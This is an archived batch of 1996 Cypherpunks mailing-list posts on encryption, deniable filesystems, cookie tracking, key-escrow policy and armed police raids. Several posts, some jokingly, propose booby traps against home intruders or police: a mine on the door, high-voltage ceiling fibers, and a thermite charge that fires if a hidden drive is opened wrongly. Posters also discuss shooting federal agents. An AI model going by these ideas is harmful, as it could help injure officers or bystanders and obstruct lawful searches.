Message-ID: <01BB75F4.8F028E40@ip160.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


Is it possible to penetrate a firewall?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 20 Jul 1996 12:22:32 +0800
To: snow@smoke.suba.com (snow)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <199607200036.RAA15172@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:49 PM 7/19/96 -0500, Igor Chudov @ home wrote:
>> 
>>      I may be a little nuts, but does it strike anyone else that a good 
>> self defense weapon against ninja raids would be a hand gernade? 
>> 
>
>Maybe not even a little:)
>
>I suggest wiring an anti-tank mine to your door every night. If 
>ninjas break in, everyone goes to hell. No need to wake up and be
>alert in sleep -- all will be done automatically. So before that
>ninja raid you will sleep better.


I've had a substantially better idea.  Hang carbon-fiber bundles from the 
ceiling, which are charged to about 10,000 volts when an intrusion is 
detected.  They'll glom onto anything conductive within their range, and 
anyone with the bad fortune to be breaking into the house at that moment 
_might_ live to regret it.  (resistors could be added to limit the current 
to non-fatal but exceedingly painful levels.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mikhail A. Sokolov" <mishania@demos.su>
Date: Sat, 20 Jul 1996 00:50:55 +0800
To: harka@nycmetro.com
Subject: Re: Secure IRC conversations
In-Reply-To: <TCPSMTP.16.7.18.15.31.48.2780269260.1197732@nycmetro.com>
Message-ID: <199607191336.RAA10931@megillah.demos.su>
MIME-Version: 1.0
Content-Type: text


> 
> Hi there,
> 
> does anybody know of a way to have encrypted conversations on the IRC or via ytalk?
> 

Well, as for irc, not unless you make your client do it. Though, try using
more secure dcc protocol, described as Direct Client to Client protocol --
implementing whatever you want there to be is possible and easy.
See rfc1459.

> Thanks,
> Harka

-mishania




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Sat, 20 Jul 1996 07:50:22 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: MSNBC and cookies
In-Reply-To: <199607191300.JAA00488@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.95.960719175545.4812B-100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain


	Peter:

On Fri, 19 Jul 1996, Peter D. Junger wrote:

> : I tried accessing the page (http://www.msnbc.com) on 7/18/96 around 9:15 PM
>  But what happens when one tries to access it with Lynx?

	What page?   I just tried it, and all I saw I was
	"Wwelcome to MSNBC" and "[LINK]".

	Tried to link, and found myself back on the same screen.
	
	The only thing that isn't usual for the site, in comparison
	to the stuff that comes out of Redmond, is a high sticker price.

        xan

        jonathon
        grafolog@netcom.com



	AOL coasters are unique, and colourful.  
		Collect the entire set. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 20 Jul 1996 21:01:51 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.32.19960719195905.008675d0@panix.com>
Message-ID: <v03007615ae15b80bb9a0@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:59 PM -0400 7/19/96, Duncan Frissell wrote:
...
> Liddy's remarks on shooting federal agents who unlawfully break into your
> hose.
  ^^^^

Now *that's* an invasion of privacy...

;-)

Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 20 Jul 1996 05:18:47 +0800
To: cypherpunks@toad.com
Subject: Netscape
Message-ID: <199607191626.SAA09380@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi!

There appears to be some new Netscape files with US
encryption in ftp://utopia.hacktic.nl/pub/replay/pub/incoming/

netscape-fts2-hp10.tar.gz	Fast Track Server 2.0 for HPUX10
netscape-fts2-nt.exe		Fast Track Server 2.0 for WinNT
netscape-hpus-30b5.tar.gz	Navigator 3.0b5 for HP-UX
netscape-linux-30b5.tar.gz	Navigator 3.0b5 for Linux
netscape-ssl30-src.tar.gz	SSL 3.0 source code
netscape32us-30b5.exe		Navigator 3.0b5 for Win95/NT

By the way, is it possible to get a certificate for the
Fast Track 128 bit servers outside of north america? Or
would the certificate issuer be conspiring to export
crypto if he exported a certificate?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 20 Jul 1996 20:47:27 +0800
To: WlkngOwl@unix.asb.com
Subject: Re: Opiated file systems
In-Reply-To: <199607191718.NAA04076@unix.asb.com>
Message-ID: <199607191743.SAA00535@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Rob <WlkngOwl@unix.asb.com> writes:
> On 18 Jul 96 at 22:48, Adam Back wrote:
> [...]
> > ie. the attacker can not tell without the hidden file system key (if
> > one exists) whether the unused space on your drive is really just
> > that: unused space filled with garbage, or whether it is in fact
> > another encrytped filesystem.
> 
> There has to be a way to tell the system that the sectors are used 
> when not the drive isn't mounted and the filesystem isn't active.

Ah I see what you're getting at.  My solution (I'm sure I wrote this
somewhere in this thread) was that you'd always have to mount both
file systems during normal usage, otherwise you'd risk damaging the
hidden fs.  You'd only mount the duress fs alone in a duress situation.

Not attractive, but I don't see any easy way around it.

> > They might be suspicious, but I don't think they would be able to
> > claim you were in comptempt of court, if you provide the 1st key and
> > claim there is no other key: the software has support for either 1
> > or 2 filesystems.
> 
> Having a copy of the driver is enough to arouse suspicion.  If they 
> don't find anything useful in that one partition, they'll assume 
> the second is in use and that you're not giving up the key.  You may 
> very well get accused of maintaining a second system even if you are 
> not and do not have anything incriminating in the one encrypted fs.

You could be right, I'm not sure how it would go in practice.  But I
don't think there is really much more you can do unless you assume the
ability to conceal a piece of hardware from your opponents.  Say like
a floppy disk with the stego or duress drivers on?  But that gives
rise to all sorts of problems also... where do you store it when
you're not using the computer?  What if they grab you while you're at
the computer?  When you leave the computer for 5 mins?

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 20 Jul 1996 12:25:44 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Bare fibers
Message-ID: <199607200153.SAA18305@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:32 PM 7/18/96 -0700, Cerridwyn Llewyellyn wrote:
>
>>a (hidden) drive to your computer using a reasonably surreptious link that 
>>is difficult to trace.  Say, an IR optical link, a single bare (unjacketed) 
>>optical fiber, a LAN with hidden nodes, or a similar system.  Maybe an 
>
>I find the idea of the optical fiber very interesting.  Is there such
>a beast currently available?  I really don't know anything about fiber,
>and therefore it would be very difficult for me to construct such a
>system myself...

Unjacketed fiber exists, but since its primary use is to build up jacketed 
fibers and fiber bundles, it is rarely seen in industry outside of the 
companies which normally use it.  But it is available.  The fiber is usually 
coated with a very thin layer of clear plastic to protect against moisture 
and abrasion, and the diameter  is around 0.5 to 1.0 millimeters in diameter.  

Terminating fiber is specialized; it is cleaved using diamond tools, and is 
usually polished after mounting in a holder.  These days, transmitters and 
receivers are easily available.  For a relatively short run, plastic fibers 
would probably be the best bet.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 20 Jul 1996 15:30:12 +0800
To: WlkngOwl@unix.asb.com
Subject: Re: Opiated file systems
In-Reply-To: <199607191718.NAA04087@unix.asb.com>
Message-ID: <199607191806.TAA00542@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Rob <WlkngOwl@unix.asb.com> writes:
> On 18 Jul 96 at 11:01, Adam Back wrote:
> 
> > For plausibility it would probably be best if very few people used the
> > duress key feature.
> 
> And how can you guarantee that?

User apathy, people not reading documentation, documenting it as an
advanced feature... etc.

How many people actually generate a PGP key revocation cert in advance
in case of losing the key for instance?

> Also: an attacker doesn't care about what percentage of (other)
> users use duress feature of not.  His concern is whether you use it.

Good point.  But what other data does the attacker have aside from how
many others do?  Even knowing how many others do would be
tricky.. are they telling the truth when they say they aren't?

> Note that you'd have to be careful of what you say and do over email 
> in the clear (or encrypted to someone cooperating with an attacker): 
> if you post an excerpt of source code or maybe somehting like 
> Edupage, or if you save mail, there might be reason enough for the 
> attacker to expect to see some of that on your encrypted fs after 
> he's rubber-hosed your key from you.  If he doesn't, and he knows you 
> have a possibility of using the duress-key feature...

Smart analysis, yes you'd have to be very careful to partition the way
you used the two file systems.  You'd have to pretend that the 2nd
partition did not exist when comunicating with any one who you didn't
trust.  Perhaps you could have some assistance even... making the
duress file system read only when you have the hidden fs mounted as an
option to remove the chance of accidentally copying something from the
hidden fs that you couldn't (otherwise) explain being your possesion?

Someone cooperating with the attacker could be tricky though,
ultimately there's not much you can do about infiltration aside from
always using a nym for correspondence to do with your hidden persona
which goes with your hidden fs.

> Oh yeah. Psychology is a good way of determining the likelihood of 
> using a duress system.

Hmm, the psychological aspect of your plausible deniability.  Don't
think cryptographic protocols can do much about that.

> With the extra work and overhead of a duress system, you're better 
> off using stego on some gifs or graphics files.

But I don't think stego solves your whole problem: you still have to
have software to access the stegoed data.  Where do you store this?
Nearly back to square one.  (If the answer is on a floppy this applies
equally to a duress file system).

The one advantage of stegoed data is that you expect the least
sig. bits in image files to be random, where-as you don't expect the
LSBs in unused space (even in encrytped file systems once you're
inside the encryption layer) to be random.

However the disadvantage is 8 - 24 times reduction in space
efficiency.  (Your earlier point).

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: harka@nycmetro.com
Date: Sat, 20 Jul 1996 14:36:55 +0800
To: cypherpunks@toad.com
Subject: Re: Responding to Pre-daw
Message-ID: <TCPSMTP.16.7.19.-13.18.54.2780269260.1198985@nycmetro.com>
MIME-Version: 1.0
Content-Type: text/plain


 -=> Quoting In:hua@chromatic.com to Harka <=-

 > > If you want to own guns then you should accept the fact that you risk
 > > having your head blown off in the middle of the night by a SWAT team.
 > > Just as the car has introduced the risk of being killed in a trafic
 > > accident the gun has introduced new risks. If society dosen't like the
 > > risks then it can opt to ban the technology. 
 > 
 > Except that getting killed in a traffic accident IS an accident (mostly :)
 > while having black clad Fed's storming into your house was _consciously_
 > decided by them, because THEY have a problem with YOUR guns (?!)...

 In> I think the original point was that they MIGHT storm into your house
 In> by mistake (say, because they incorrectly accepted a informant's
 In> story). Therefore, it is truly a mistake.

 Well, not really. It would be severe case of neglegence which is not the same as a mistake. When you drive, you have to prove that you know what you are doing by getting a driver's licence.
 If you are a SWAT guy and some informer would come along and say "This and that person is a terrorist, I know for sure" and you go into that house and shoot everything that moves, well, doesn't sound much like an accident to me...


Harka
___ Blue Wave/386 v2.30 [NR]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Sat, 20 Jul 1996 13:07:50 +0800
To: Jonathon Blake <cypherpunks@toad.com
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <4snp6n$s9u@life.ai.mit.edu>
Message-ID: <31F01F8B.794B@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Jonathon Blake wrote:

> On Fri, 19 Jul 1996, Hallam-Baker wrote:
> 
> > dangerous people arround besides the government and the government is the

>         The _only_ difference between a gang of thugs, and a government,
>         is that the latter admit to being thugs, whilst the former deny
>         that.  They both operate on the same prinicple -- steal from
>         others, and kill those that oppose them.

The people of the USA fortunately disagree. Its no coincidence that Limbaugh
has been unable to continue his tv show after his coverage of the OKC bombing.

It is not socialy acceptable to call for the murder of Police officers in most
countries. By doing so you are discrediting yourself and those who support you.



> > only agency that is going to protect society from them. If you don't like
> 
>         Governments are the agencies _most_ likely to abuse one's
>         freedom.   << Take Northern Ireland, as an example of what
>         happens, when a government tries to pacify a region, by
>         prohibiting everything.  >>

Troops were sent into Northern Ireland originally to protect the Catholic 
minority from the protestants. The two communities have been murdering each
other for centuries and there are bigots on both sides who think that the
events of three hundred years ago "prove" that the other is evil incarnate.

Do you support the "punishment beatings" performed by the IRA. So far this
year they have committed grievous bodliy harm against 270 people. They have
also murdered 4 people. There have been no deaths from police or army use
of firearms in that period. Your assertion is therefore false.

If you want to discuss the politics of Ireland you should at least visit the
place. You will find remarkably less sympathy for your romantic visions of
bloodshed amongst the people who have to live with the consequences. The
British people have little sympathy for either side and would quite happily
leave the two sides to slaughter each other if it wasnt for the fact that
the majority of the population wish to remain British and have voted to
remain so in regular referenda and national elections.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Sat, 20 Jul 1996 13:37:46 +0800
To: "cypherpunks" <tcmay@got.net>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
Message-ID: <199607200307.UAA05495@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Jul 96 01:20:16 -0800, tcmay@got.net wrote:

>I wonder when and how raids in the U.S. moved from the "Come out with your
>hands up" verbal announcement (for the cases that needed more than a knock
>on the door) to this blast-in-the-doors approach, where the raiders are
>dressed in "tactical black" and are wearing black Nomex hoods and carrying
>MP-5s and blast any "perp" who looks at them cross-eyed?

OTOH, you have to admit that the possibility of being attacked by a (most
likely) better armed criminal has bothered many cops - it has to be a
rather stresful job. Sadly, they seem to either a) overreact as noted
above or b) be led by idiots who order the above...  I used to be a
fidonet point off of a board run by a cop. He was very reasonable, and
unfortunately seemed to be right at the point where he had enough
"empowerment" to be blamed but not enough to shine a little common sense
into things... Almost like Vietnam - the grunts get shot and ridiculed
because the desk-pilots can't make a valid policy. I liked Tom Clancy's
description of the CIA: "We have a lot of people who are good at ordering
their martninis shaken, not stirred." 


>As people as diverse as Marine Colonel Jeff Cooper and Watergate felon G.
>Gordon Liddy have noted, any black-clad "ninjas" entering a home at 4 a.m.
>without clearly announcing themselves are asking for trouble. (Liddy got in
>a lot of trouble for calling for "head shots" on rampaging BATFags.
>Frankly, I'm not a good enough shot--especially in high-stress
>situations--to make head shots with my H & K .45, so I can only hope to
>make torso shots.)

See, you need to use that computer - automated defense systems. Bet it
could do okay with a ballistics module... <g>

>least two of them with me. (Interestingly, the same class of folks who want
>to ban "military-grade crypto" are also seeking to ban Kevlar vest-piercing
>rounds. Fortunately, though KTW ammo is no longer available to "marks" (=
>civilians), .45 ACP +P does a pretty good job. Certain +P .357 Magnum
What's really funny is that nobody seems to notice that criminals aren't
that concerned with breaking laws.  I think some people need to go to
Dogbert's school of Common Sense... 


// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 20 Jul 1996 13:29:24 +0800
To: cypherpunks@toad.com
Subject: Re: MSNBC and cookies
In-Reply-To: <Pine.SUN.3.95.960719175545.4812B-100000@netcom9>
Message-ID: <199607200318.UAA16515@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I find that MSNBC is now working OK without cookies. I tried off and on
during the day today (Friday) and last night and it didn't work, but it
is working OK now.  I can get in with lynx or with my cookie-blocked
Netscape.  I sent them a nasty letter this afternoon complaining about it
so either that may have helped or it is obsolete.  Maybe it was just a
glitch?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 20 Jul 1996 13:52:14 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <199607200036.RAA15172@mail.pacifier.com>
Message-ID: <199607200134.UAA01969@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:
> At 03:49 PM 7/19/96 -0500, Igor Chudov @ home wrote:
> >>      I may be a little nuts, but does it strike anyone else that a good 
> >> self defense weapon against ninja raids would be a hand gernade? 
> >
> >Maybe not even a little:)
> >
> >I suggest wiring an anti-tank mine to your door every night. If 
> >ninjas break in, everyone goes to hell. No need to wake up and be
> >alert in sleep -- all will be done automatically. So before that
> >ninja raid you will sleep better.
> 
> I've had a substantially better idea.  Hang carbon-fiber bundles from the 
> ceiling, which are charged to about 10,000 volts when an intrusion is 
> detected.  They'll glom onto anything conductive within their range, and 
> anyone with the bad fortune to be breaking into the house at that moment 
> _might_ live to regret it.  (resistors could be added to limit the current 
> to non-fatal but exceedingly painful levels.

It the voltage is 10000 volts, it is always fatal, right? And if you set
good enough resistors, then the voltage for the human body itself would
be much less than 10000V -- most of the voltage will be taken by resistors
themselves.

Right?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 20 Jul 1996 13:49:35 +0800
To: cypherpunks@toad.com
Subject: American People the relation to the Police
Message-ID: <199607200138.UAA27472@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hello,

Forwarded message:

> Date: Fri, 19 Jul 1996 19:51:39 -0400
> From: Hallam-Baker <hallam@ai.mit.edu>
> Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
> 
> The people of the USA fortunately disagree. Its no coincidence that Limbaugh
> has been unable to continue his tv show after his coverage of the OKC bombing.
> It is not socially acceptable to call for the murder of Police officers in most
> countries. By doing so you are discrediting yourself and those who support you.

I am a US citizen. My family were French Heugonauts who came here to escape
persecution on religious grounds in the late 1590's. One of my ancestors,
Rufus Choate, was a lawyer who argued Women Suffrage to the Supreme Court
(he lost AFAIK) in the 1890's.

I am operating under two premises. First, that the Constitution is the
supreme law of the land. I am also interpreting it literally, under the
assumption that our founding fathers were reasonably intelligent men and
knew how to express their intents clearly. It is only our desire to avoid
the uncertainty that some of the rights imply (eg speech) as well as the
potential damage they might cause that clouds the issues for us. In short
the uncertainty in constitutional law comes from us and not the
Constitution.

I disagree. This country fought two wars of liberation (you forgot about
1812) and a civil war to discredit this thesis in relation to a Democracy
founded upon individual liberty. It is no coincidence that the Tree of Liberty
needs watered with blood on occasion. It is how the value of human life and
the pursuits thereof are measured.

The entire point of the Second Amendment to the Constitution is to guarantee
that the Federal Government does not have sole access to and use of deadly
force. The Militia exists to fight the Federal government and other internal
insurrections. The Army and Navy are pointed outward, from a constitutional
point any use of these forces inside the border of the United States against
US citizens is prohibited. At no point is the military given authority over
any civil organization or individuals in the Constitution other than in
times of war with declaration of Martial Law. I further contend that without
Martial Law being called the current use of the military in civil law
enforcement are unconstitutional.

I will further contend that various parts of the Constitution clearly
show intent on the part of the founding fathers to limit the ability of the
Federal government to use force. We should recognize what they seemed to
have understood viceraly. All rights stem from an individual being alive.
Civilization and Democracy in particular should be to increase the ability
of an individual to do this. They also understood that democratic government
were entered into by the founders (at least, automatic citizenship clouds
this issue down the road) voluntarily and with the clear intent to better
their position in the world. To this end the avoidance of the use of
violence at all costs short of losing your life is a major plus. The
constitutional point is to reduce the need for violence.
 
Revolution and War are not murder unless you lose. This is a basic tenet of
civilization.

I want to be sure you understand I am NOT calling for the use of force
against anyone. I believe the only legitimate use of force is in the
immediate and direct threat to ones life. I also think that the majority of
our current problems can be resolved by the inclusion of the 9th and 10th
Amendment in our legal system.

> Do you support the "punishment beatings" performed by the IRA. So far this
> year they have committed grievous bodliy harm against 270 people. They have
> also murdered 4 people. There have been no deaths from police or army use
> of firearms in that period. Your assertion is therefore false.

How many of them died? Beaten? And from what? Seems I see a article now and
again about somebody getting killed from rubber bullets, tear gas, beatings,
etc. from police and other related forces.

> If you want to discuss the politics of Ireland you should at least visit the
> place.

You don't have to fall off a mountain to understand the implications of a
fall, understanding does not require direct experience in all cases.

> You will find remarkably less sympathy for your romantic visions of
> bloodshed amongst the people who have to live with the consequences. The
> British people have little sympathy for either side and would quite happily
> leave the two sides to slaughter each other if it wasnt for the fact that
> the majority of the population wish to remain British and have voted to
> remain so in regular referenda and national elections.

If true, it doesn't speak very highly of the British people.


                                              Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Sat, 20 Jul 1996 19:29:04 +0800
To: "cypherpunks" <dfloyd@IO.COM>
Subject: Re: Opiated file systems
Message-ID: <199607200454.VAA10536@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Jul 96 18:49:04 -0800, dfloyd@IO.COM wrote:

>The problem I ran into firsthand with archive sites is that they tend to
>turn into porn or pirated software servers.  One could then have the
>software delete after a download.  Anyway, one is always open to a denial
>of service attack where someone just throws chunks of /dev/random at you.

>If someone has any ideas on how to slow down attacks like this, please
>E-mail me.  It would be nice to have an offsite storage place, but without
>the necessity of giving a bunch of personal info (as with Mcaffee's
>WebStor).

A) Only accept files with valid PGP signatures from accepted keys - this
is one area where PGP's commandline interface is a plus - just write a
batch script. Demand that a separate file be sent first, signed by a
certain key. This file would contain valid filenames for the rest of the
session. If a non-listed file is sent, kill the session.  This could all
be automated with a simple program. You could probably even use SSLs and
similar to do it on a website if you could swill the PGP bit - maybe a
plugin?

B) bounce trash back.

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erle Greer <erleg@sdinter.net>
Date: Sat, 20 Jul 1996 14:12:38 +0800
To: cypherpunks@toad.com
Subject: Viacrypt PGP version 4.0
Message-ID: <2.2.32.19960720021701.006b1570@pop3.sdinter.net>
MIME-Version: 1.0
Content-Type: text/plain


Is there a free/trial/steal/shareware version of Viacrypt PGP Personal
version 4.0, rather than forking over $129.00?

      /---\       |======================================|
     / /\/ \      |If a train station is where a train   |
     \ \   /      |stops, then what is a workstation?    |
      \ \ /       |--------------------------------------|
   /\  |/|  /\    |I am not saying that there are no     |
  /  \ |\| /  \   |gods; just that I haven't had the     |
 /    \|/|/    \  |pleasure to meet one.                 |
--------\-------- |--------------------------------------|
        /         |Disclaimer: My opinions never reflect |
        \         |that of my employer.                  |
        v         |======================================|
                  |Please respond via E-Mail; I rarely   |
                  |check the newsgroups for responses.   |
                  |======================================|
                  | mailto:vagab0nd@sd.cybernex.net      |
                  | http://www.sdinter.net/~erleg        |
                  | If you think my Sig is big...        |
                  |======================================|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Sat, 20 Jul 1996 19:09:43 +0800
To: "cypherpunks" <jimbell@pacifier.com>
Subject: Re: Opiated file systems
Message-ID: <199607200456.VAA07195@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 18 Jul 96 06:13:42 -0800, jimbell@pacifier.com wrote:

>>1. Confiscate computer (along with physical drive) with duress-capable
>>encrypted file system; 2. back up the encrypted sectors; 3. reverse-engineer file 
>>system driver to figure out how the duress-key works, if there are 
>>multiple keys, where data is stored; 4. make sure you've rubber-hosed 
>>or subpeoned all passphrases or keys; 4a. if the system destroys data, 
>>you've got backups ("Very funny kiddo; now give us the real key...")
>>4b. even if there are two filesystems, the attacker will want access 
>>to both, just to make sure...
>
>It has long occurred to me, considering the size and low power of the 
>typical 3.5" hard drive compared with the size of the typical house or 
>apartment, that it might be an interesting project to remotely connect such 
>a (hidden) drive to your computer using a reasonably surreptious link that 
>is difficult to trace.  Say, an IR optical link, a single bare (unjacketed) 
>optical fiber, a LAN with hidden nodes, or a similar system.  Maybe an 
>inductive pickup.  In any raid, they'll have to decide what to take, and 
>chances are very good that they won't find every hidden item.

Induction would be a good choice.  Hmmm, how about using the house water
pipes? (Or heater ducts?) Not only should they conduct water, it does
offer the possibility of some VERY funny hiding spots.  If you were
seriously worried, you could even waterproof the drive (Enough epoxy and
almost anything can be waterproofed <g>) and power it off of a turbine in
the water pipe!  I imagine hiding it in a septic tank would probably
discourage searchers as well... Finally, I'd have a duress code (or
emergency button or timer ... etc) wired up to a thermite charge. Might
be a bit permanent, but certainly would come in handy.  (hmmm. Wire it up
behind an access panel in a heater duct. Set it so there are something
like 15 screws that need to be unfastened to get to it, including some
elsewhere. If it's done in the wrong order, WHOOSH)

Oh, and did I mention that putting it in a (metal) duct or pipe would
probably be enough to tempest shield a drive? (As I understand it,
monitors are the least secure part of the system, followed by cpus.)  In
fact, it ought to be enough to throw off a metal detecter/search device
as well. You could even leave a crudload of old MFM drives (20MB! wheee!)
in similar spots as decoys... Put things like encrypted copies of the
constitution, large scans of 4th ammendment plaintext, etc, on those...
Ought to be at least irritating and it might be interesting to have them
have to read that into record at a trial as well...

BTW, I'd try a fiber-optic connector to the machine because 1) it's
waterproof and you wouldn't have to be quite as paranoid about leaks, 2)
it's far more secure, 3) it's faster and 4) it's probably impossible to
trace like a metal wire (i.e. run current through and trace magnetic
fields...). Put it in the usual snarl of wires (Cable TV, telephone -
multiple lines of course, home intranet, etc) and it could be really
nasty. Finally, if it was wired up on a home network, you could protect
by carefully choosing your network architecture, hopefully getting one
that allows hidden devices (i.e. only shows up on access attempts,
perhaps only w/right password.)

// Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
// Automatically receive my resume or PGPKEY by sending email with a subject
// of 'send PGPKEY' or 'send resume'. Capitalization counts so be careful!
 

                                                                                                                                                                                                                                             








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 20 Jul 1996 15:27:13 +0800
To: jsw@netscape.com
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
Message-ID: <199607200439.VAA10181@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:27 AM 7/19/96 -0700, you wrote:
>Roy M. Silvernail wrote:
>>    Anyone sniffing the link
>>    knows the filename from previous forms submissions, anyway.
>  You can't sniff the link, since the form submission and the
>  file download are via SSL.

Presumably 40-bit RC4 for most users?  :-)

(It is still strong enought to reduce casual eavesdropping....)

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jt@freenix.fr (Jerome Thorel)
Date: Sat, 20 Jul 1996 21:09:14 +0800
To: thorel@netpress.fr
Subject: lambda 2.09 - French Telco Act Censored?
Message-ID: <v01540b03ae15a332f487@[194.51.213.140]>
MIME-Version: 1.0
Content-Type: text/plain


netizen's --> Lambda Bulletin 2.09 <-- contents
-->> www.freenix.fr/netizen

+ Censoring Censorship Attempts
French Telco Act's Internet control sections may be unconstitutional.
+ Encryption : The OECD fails to act on key-escrow policy


*     *     *     *     *     *     *     *

CENSORING CENSORSHIP ATTEMPTS -- A LA FRANCAISE

The French Telco Act, which was voted by the Parliament on June 7, may
follow the same path than the US Communications Decency Act. A group of
Socialists Senators has sent a request to examine eventual
unconstitutionality of the law.

The new Act, due to meet new criteria for telecoms competition in France,
has also taken some steps to create an administrative control of speech and
services via online services and the Internet. The new council, le Conseil
Supérieur de la Télématique, "could block the free communication of
thoughts and opinions, and may eventually establish a principle of
preliminary declaration" for online speech, reads the document given to the
Conseil Constitutionnel, the supreme watchdog of the French 1958
Constitution (and the principles of the 1789 Declaration des Droits de
l'Homme et du Citoyen).

Indeed, the law may breach article 34 of the Constitution which says that
the Parliament alone could indict rules concerning "the basic garanties
given to citizens for the exercice of their civil liberties". But the newly
created CST may appreciate if a Web site or a newgroup could be illicite
according to the French Penal Code. This "appreciation" is not sufficiently
well defined in the Telco Act, constitutionnal jurists said.

Article 66 of the Constitution also states that the appreciation of the
Penal Code should be the role of the penal judiciary (le Juge Penal), but
shouldn't depend on any administrative body or any administrative judge
(Juge Administratif).

But other voices said that the existing Conseil Supérieur de l'Audiovisuel
(which regulates broadcasting content) is based on the same principles.
Then, the Conseil Constitutionnel will have to make a difference between a
TV program and a Usenet feed. That's what the Philadelphia Court acted when
they censored the CDA.

Final decision awaited in Paris before the end of July (July 26th in theory).


     *     *     *     *     *     *     *     *

OECD FAILS TO ACT ON KEY-ESCROW ENCRYPTION; THE US ACCUSED OF "POLICY
LAUNDERING"

The Paris-based OECD, the 24-members club of industrialised nations, has
failed to take a step towards international recongnition of key-escrow
encryption. The meeting of June 26-28 in Paris, scheduled to take a firm
decision about the possibility of law enforcement agencies to read
electronic mail of private individuals and corporations, didn't succeed to
act on a compromise. The OECD's general secretary has no special power to
draw regulations and must find a common policy on the matter.

Sources said the OECD has been set apart between "the key escrow group" --
mainly USA, France and Britain -- and the "laxist" group -- mainly Japan
and Europe's Scandinavian countries like Sweden, Denmark and Finland
(Germany was still uncertain).

A press release of the OECD says that no final decisions were made. There
will be no other comment of the case. "The OECD experts grappled with
achieving a balance between respect of national sovereignty and developing
an international approach.  This dialogue will be continued at a third
meeting of the group, scheduled to take place on 26-27 September, in Paris.



An OECD spokeswoman said the organisation asked independant experts from
the Electronic Privacy Information Center (Washington, DC) to participate
in preliminary meetings. The EPIC prefers not to make any comment until the
next meeting in September.

